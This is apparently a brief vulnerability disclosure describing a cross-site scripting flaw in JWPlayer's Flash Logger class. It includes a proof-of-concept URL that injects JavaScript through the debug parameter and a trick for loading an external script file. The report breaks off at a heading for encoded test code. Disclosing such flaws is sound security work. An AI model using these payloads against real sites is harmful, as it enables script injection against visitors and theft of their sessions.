
A Xss vulnerability in JWPlayer

Test Browser: IE , Firefox.

Test Platform: Win 7.

1. The Bug code in

package com.longtailvideo.jwplayer.utils
class Logger
private static function send(_arg1:String):void

if (ExternalInterface.available){
ExternalInterface.call(_config.debug, text);<---directly use _config.debug

2. The _config.debug is directly used as the first parameter of ExternalInterface.call. And the _config is loaded from loaderInfo.parameters. Therefore, when we construct a link such as " jwplayer.swf?debug=(function(){alert('xxx')})() ", the passed-in javascript code will be run.

3. Then we can use the trick location.href='javascript:"<script src={js file url}></script>"' to load and run external javascript file.

Test encoded evil code:
